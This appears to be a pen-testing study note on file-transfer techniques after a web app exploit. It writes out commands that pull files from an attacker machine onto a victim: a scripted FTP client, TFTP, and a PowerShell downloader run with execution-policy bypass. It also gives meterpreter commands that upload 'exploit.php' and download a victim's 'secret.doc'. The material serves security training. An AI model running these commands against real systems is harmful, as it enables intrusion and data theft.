November 6, 2019 · Basic Pen-Testing
10.6 : Web app exploitation - File transfers
Common File Transfers Method
Http
- Use
nginx
/apache
for the service
FTP
-
setup ftp server by
python-pyftpdlib
cd /var/yourdir python -m python-pyftpdlib -p 21
-
Windows or Linux both acceptable
echo open [kali ip] 21> ftp.txt echo USER anonymous>> ftp.txt # username echo pass>> ftp.txt # password echo bin>> ftp.txt # binary mode echo GET [file]>> ftp.txt echo bye>> ftp.txt ftp -v -n -s:ftp.txt
TFTP
- Windows XP, 2003
- Windows 7 or later need to be installed manually.
- Attack side
mkdir /tftp atftpd --daemon --port 69 /tftp
- victim
tftp -i $SrcIP get $filePath
Linux
wget
curl
ftp
Windows
ftp
powershell
echo $storageDir = $pwd >wget.ps1 echo $webclient = New-Object System.Net.WebClient >>wget.ps1 echo $url = "http://[kali ip]/[file]" >>wget.ps1 echo $file = "[file]" >>wget.ps1 echo $webclient.DownloadFile($url,$file) >>wget.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Metasploit
- need to get shell on the machine first
- then use
meterpreter
bysessions
command
upload /var/www/html/exploit.php c:\\Users\\IEUser\\exploit.php
download c:\\Users\\IEUser\\secret.doc /var/www/html/secret.doc